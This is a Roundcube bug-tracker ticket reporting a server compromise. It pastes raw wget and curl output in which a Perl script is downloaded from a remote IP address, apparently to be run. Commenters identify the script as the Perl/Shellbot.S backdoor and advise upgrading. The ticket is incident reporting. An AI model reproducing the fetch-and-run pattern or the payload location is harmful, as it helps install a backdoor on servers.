Opened 3 years ago
Closed 3 years ago
#1486465 closed Bugs (worksforme)
roundcube perl attack
| Reported by: | student7 | Owned by: | |
|---|---|---|---|
| Priority: | 1 - Highest | Milestone: | 0.4-beta |
| Component: | Security | Version: | 0.3.1 |
| Severity: | normal | Keywords: | |
| Cc: | byron@… |
Description
--2010-01-29 15:04:31-- http://66.246.218.60/roundcube/logs/perl
Connecting to 66.246.218.60:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39904 (39K) [text/plain]
Saving to: `perl'
0K .......... .......... .......... ........ 100% 209K=0.2s
2010-01-29 15:04:31 (209 KB/s) - `perl' saved [39904/39904]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
M 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0M100 39904 100 39904 0 0 90986 0 --:--:-- --:--:-- --:--:-- 109k
sh: fetch: command not found
perl: no process found
Change History (3)
comment:1 Changed 3 years ago by alec
- Milestone changed from later to 0.4-beta
- Priority changed from 5 to 1 - Highest
comment:2 Changed 3 years ago by glob
- Cc byron@… added
That's the Perl/Shellbot.S backdoor.
It uses an exploit in SQuery to propagate (http://osvdb.org/show/osvdb/24408).
comment:3 Changed 3 years ago by alec
- Resolution set to worksforme
- Status changed from new to closed
This Perl script could also be uploaded using security issues in old Roundcube versions. The Roundcube at http://66.246.218.60/roundcube doesn't look like 0.3 to me, so you should just do an update.

Someone has hacked your server, but the log doesn't show how. Are you using 0.3.1?